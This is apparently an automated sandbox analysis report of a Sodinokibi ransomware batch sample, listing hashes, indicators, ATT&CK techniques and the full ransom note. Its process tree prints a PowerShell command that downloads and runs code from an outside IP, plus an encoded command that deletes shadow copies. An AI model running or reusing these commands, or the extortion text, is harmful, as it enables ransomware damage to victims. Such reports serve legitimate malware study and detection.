sodinokibi | ab2207ca32e7d0e2434060e8a2d6cb8bf247c9d3174fe86c5c06fb0100c31838

General

Target

02e935713bd82b8d92596478da846147.bat
Size

222B
MD5

709373b57a3c4758065b1f72f1a19b2d
SHA1

b820438ee7bcc43e84373b68f9fec3bedc10c25a
SHA256

ab2207ca32e7d0e2434060e8a2d6cb8bf247c9d3174fe86c5c06fb0100c31838
SHA512

d5061ac40ed9258dcb412dcf5eb05fe716affcd44a388b81b9b89e29317f51138fc8e7a13d1f195a5d3647736aea67c66a1d73fb4cff70406851cd2c29f1816f

Score

10^/10

ransomware persistence sodinokibi

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/02e935713bd82b8d92596478da846147

Extracted

Path

C:\69j456788-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 69j456788. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A3AEEB525E171025 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/A3AEEB525E171025 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: F3NiOjPjLLzI77e87APzvT22+TI3HufgJwxluqialaiEds+IUwO4kYjlg+7gzrvq PVT/kub253am8WL+DUZPMjW2XPcKIlmmfiK4UH/HB1boKr8kBCh56YWV/6hjn1NK yH1Ti47R4FtObahDFOYHOw6dcf1/nwMCgqEfISqTC4viGkhTps2fi1pnAtl5oUKk N8r+aAIk2qV0UHR058soZjhSZh3C5po8dBIj8Ra1CNKb1gPEnHF9Eb7HuuGHomWf YCfXPc/ks3P+Lc6bnMqfmQjaTd8iqoXy+1BCcssozHJ4zjMBdB80DbY3XXEgIZ7q Sl/vTROY9pf3z8RkhbkJQgF3453cATDnVdTws2jy9pygh8cBK9VoKGg9oJhzz0uS ZhzQP6ueD7aAxssnLkRr8bzvW+4Bb54xAYQXTrzrq152iLo+jTjvbuOuRqAo64xO ngalcw+OzvMe7oFFLjPn8VAXyHLldD/GjPYWZVTjUVA836lKRfPYSOa56WVSs8rM 04QkrDCAMDmhrEErz5nw2EEckgKNrwpNp8iX/D5/0IfFuMLCHcTPKwTZ1QoEL/id BZ2jMBzLmu3n4qKAimI+TaXkA1ICY+BqHO2I7mIDjBJlj/icx63LDyr/02rltuF/ 5LK+QgTqGu2MVBSCPuVvNtbhB1M/tfwdh4U/2mGsaI277A2+7doD4Ts5yqJIXNx7 O80S3os0yM9PJVj0T9yWLwKZEF0quxOELGRaetrHQL/MOpqgcPInfCYh+3RYkblf iHPuhmNzq3NPOQ2KXx8CELdcdA43tkulhuHqBJV6In3z0TW5hyQvQ3lfQvYDBM+D IJQyi2cv2Iwk26XkR3DGzRnq3sE4TKcrftNl5ZYipi7Yms9UwFYogKtNDY0nchcP yaiYXCVft19NeLgBjubRCbTCh8FOMo1URv3SzqYIoAxXLS7TeZukvqwqNJDLIbjz aE+ACsztL1gliIuZODhPzAejXmK8oDQTyto/flT7ZsvQbAKwIEwzB3QNYOCYy09z W6LDV62w+MehsRaHFYXlOCcluHOjsYom6xv8pSYyvfiz6ZX6/hYXNmayjXh/lL4m O1grc8TKeolJoMZ7C8pp0DEakGT9wk+Zlkl452+r94Fj038OuQLO9Zy7jIAbey+j wMk/6vjXgrmBqSPoi4RCauRjKsvLEBhPcmBak2G2Jfn3qsCB1dChJeXprmotf9Jv wmvTEtFVdWF/AjipxkRQYvinQ7D78MHvadjNMLHfeMxdusd3idw/JVuK1pBFRmvY MluyfZnxhUt+ervbrWzmf6HpjkArdA== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A3AEEB525E171025

http://decryptor.cc/A3AEEB525E171025

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Blacklisted process makes network request 62 IoCs

Processes:

powershell.exe

flow	pid	process
3	3052	powershell.exe
5	3052	powershell.exe
16	3052	powershell.exe
19	3052	powershell.exe
20	3052	powershell.exe
22	3052	powershell.exe
24	3052	powershell.exe
26	3052	powershell.exe
28	3052	powershell.exe
30	3052	powershell.exe
32	3052	powershell.exe
34	3052	powershell.exe
36	3052	powershell.exe
38	3052	powershell.exe
40	3052	powershell.exe
42	3052	powershell.exe
44	3052	powershell.exe
48	3052	powershell.exe
50	3052	powershell.exe
51	3052	powershell.exe
52	3052	powershell.exe
55	3052	powershell.exe
57	3052	powershell.exe
59	3052	powershell.exe
61	3052	powershell.exe
63	3052	powershell.exe
65	3052	powershell.exe
67	3052	powershell.exe
69	3052	powershell.exe
71	3052	powershell.exe
73	3052	powershell.exe
76	3052	powershell.exe
78	3052	powershell.exe
80	3052	powershell.exe
82	3052	powershell.exe
84	3052	powershell.exe
86	3052	powershell.exe
88	3052	powershell.exe
90	3052	powershell.exe
91	3052	powershell.exe
93	3052	powershell.exe
95	3052	powershell.exe
97	3052	powershell.exe
99	3052	powershell.exe
101	3052	powershell.exe
103	3052	powershell.exe
105	3052	powershell.exe
107	3052	powershell.exe
109	3052	powershell.exe
111	3052	powershell.exe
113	3052	powershell.exe
115	3052	powershell.exe
117	3052	powershell.exe
119	3052	powershell.exe
121	3052	powershell.exe
123	3052	powershell.exe
125	3052	powershell.exe
127	3052	powershell.exe
129	3052	powershell.exe
131	3052	powershell.exe
133	3052	powershell.exe
135	3052	powershell.exe

Modifies extensions of user files 9 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\DismountResume.crw => \??\c:\users\admin\pictures\DismountResume.crw.69j456788	powershell.exe
File renamed	C:\Users\Admin\Pictures\SuspendRename.png => \??\c:\users\admin\pictures\SuspendRename.png.69j456788	powershell.exe
File renamed	C:\Users\Admin\Pictures\UnblockLimit.tiff => \??\c:\users\admin\pictures\UnblockLimit.tiff.69j456788	powershell.exe
File renamed	C:\Users\Admin\Pictures\SwitchConnect.tiff => \??\c:\users\admin\pictures\SwitchConnect.tiff.69j456788	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\UnblockLimit.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\CheckpointUnblock.tif => \??\c:\users\admin\pictures\CheckpointUnblock.tif.69j456788	powershell.exe
File renamed	C:\Users\Admin\Pictures\ConfirmRegister.png => \??\c:\users\admin\pictures\ConfirmRegister.png.69j456788	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\SwitchConnect.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\InitializeSkip.tif => \??\c:\users\admin\pictures\InitializeSkip.tif.69j456788	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\z9e8e97kvto.bmp"	powershell.exe

Drops file in Program Files directory 35 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\TestFind.bmp	powershell.exe
File opened for modification	\??\c:\program files\ReadMove.pdf	powershell.exe
File opened for modification	\??\c:\program files\ReceiveDismount.avi	powershell.exe
File opened for modification	\??\c:\program files\SyncConvertTo.xhtml	powershell.exe
File opened for modification	\??\c:\program files\InstallSend.mp3	powershell.exe
File opened for modification	\??\c:\program files\CompleteInitialize.mht	powershell.exe
File opened for modification	\??\c:\program files\PushImport.M2TS	powershell.exe
File opened for modification	\??\c:\program files\ReceiveDeny.emz	powershell.exe
File created	\??\c:\program files (x86)\69j456788-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\GroupGet.scf	powershell.exe
File opened for modification	\??\c:\program files\InitializeCompress.png	powershell.exe
File opened for modification	\??\c:\program files\CopyUnprotect.scf	powershell.exe
File opened for modification	\??\c:\program files\RevokeExpand.xsl	powershell.exe
File opened for modification	\??\c:\program files\SendSet.WTV	powershell.exe
File opened for modification	\??\c:\program files\SkipExpand.vssx	powershell.exe
File opened for modification	\??\c:\program files\SuspendCompress.AAC	powershell.exe
File opened for modification	\??\c:\program files\UnprotectReceive.potm	powershell.exe
File opened for modification	\??\c:\program files\InitializeStep.xsl	powershell.exe
File opened for modification	\??\c:\program files\LimitGroup.ex_	powershell.exe
File opened for modification	\??\c:\program files\SearchCompress.DVR-MS	powershell.exe
File opened for modification	\??\c:\program files\UnpublishClose.wps	powershell.exe
File opened for modification	\??\c:\program files\EnableDebug.3gp	powershell.exe
File opened for modification	\??\c:\program files\DenyWatch.shtml	powershell.exe
File opened for modification	\??\c:\program files\DisconnectConvertTo.png	powershell.exe
File opened for modification	\??\c:\program files\ExpandConfirm.ex_	powershell.exe
File opened for modification	\??\c:\program files\FormatSkip.ini	powershell.exe
File opened for modification	\??\c:\program files\ImportOut.zip	powershell.exe
File opened for modification	\??\c:\program files\NewSplit.mov	powershell.exe
File opened for modification	\??\c:\program files\PopRedo.m4v	powershell.exe
File created	\??\c:\program files\69j456788-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\AssertPush.xps	powershell.exe
File opened for modification	\??\c:\program files\BlockLimit.ADTS	powershell.exe
File opened for modification	\??\c:\program files\CompressAssert.mhtml	powershell.exe
File opened for modification	\??\c:\program files\SplitResize.xml	powershell.exe
File opened for modification	\??\c:\program files\AddNew.001	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exe

pid	process
3052	powershell.exe
3052	powershell.exe
3052	powershell.exe
3052	powershell.exe
3052	powershell.exe
3184	powershell.exe
3184	powershell.exe
3184	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	3052	powershell.exe
Token: SeDebugPrivilege	3052	powershell.exe
Token: SeDebugPrivilege	3184	powershell.exe
Token: SeBackupPrivilege	1144	vssvc.exe
Token: SeRestorePrivilege	1144	vssvc.exe
Token: SeAuditPrivilege	1144	vssvc.exe
Token: SeTakeOwnershipPrivilege	3052	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 1908 wrote to memory of 3052	1908	cmd.exe	powershell.exe
PID 1908 wrote to memory of 3052	1908	cmd.exe	powershell.exe
PID 1908 wrote to memory of 3052	1908	cmd.exe	powershell.exe
PID 3052 wrote to memory of 3184	3052	powershell.exe	powershell.exe
PID 3052 wrote to memory of 3184	3052	powershell.exe	powershell.exe
PID 3052 wrote to memory of 3184	3052	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\02e935713bd82b8d92596478da846147.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1908

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/02e935713bd82b8d92596478da846147');Invoke-WIWBLXHVRXNAAOB;Start-Sleep -s 10000"
2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3052

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3184

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1144

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3052-0-0x0000000000000000-mapping.dmp

Download
memory/3052-1-0x00000000740F0000-0x00000000747DE000-memory.dmp

Filesize
6.9MB

Download
memory/3052-2-0x0000000000DE0000-0x0000000000DE1000-memory.dmp

Filesize
4KB

Download
memory/3052-3-0x0000000006ED0000-0x0000000006ED1000-memory.dmp

Filesize
4KB

Download
memory/3052-4-0x0000000006BD0000-0x0000000006BD1000-memory.dmp

Filesize
4KB

Download
memory/3052-5-0x0000000006D70000-0x0000000006D71000-memory.dmp

Filesize
4KB

Download
memory/3052-6-0x0000000006DE0000-0x0000000006DE1000-memory.dmp

Filesize
4KB

Download
memory/3052-7-0x00000000076E0000-0x00000000076E1000-memory.dmp

Filesize
4KB

Download
memory/3052-8-0x0000000006EA0000-0x0000000006EA1000-memory.dmp

Filesize
4KB

Download
memory/3052-9-0x0000000007AB0000-0x0000000007AB1000-memory.dmp

Filesize
4KB

Download
memory/3052-10-0x0000000007DB0000-0x0000000007DB1000-memory.dmp

Filesize
4KB

Download
memory/3052-11-0x00000000094E0000-0x00000000094E1000-memory.dmp

Filesize
4KB

Download
memory/3052-12-0x0000000008A60000-0x0000000008A61000-memory.dmp

Filesize
4KB

Download
memory/3184-13-0x0000000000000000-mapping.dmp

Download
memory/3184-14-0x00000000740F0000-0x00000000747DE000-memory.dmp

Filesize
6.9MB

Download
memory/3184-24-0x0000000009490000-0x0000000009491000-memory.dmp

Filesize
4KB

Download
memory/3184-26-0x0000000009440000-0x0000000009441000-memory.dmp

Filesize
4KB

Download
memory/3184-27-0x0000000009CD0000-0x0000000009CD1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads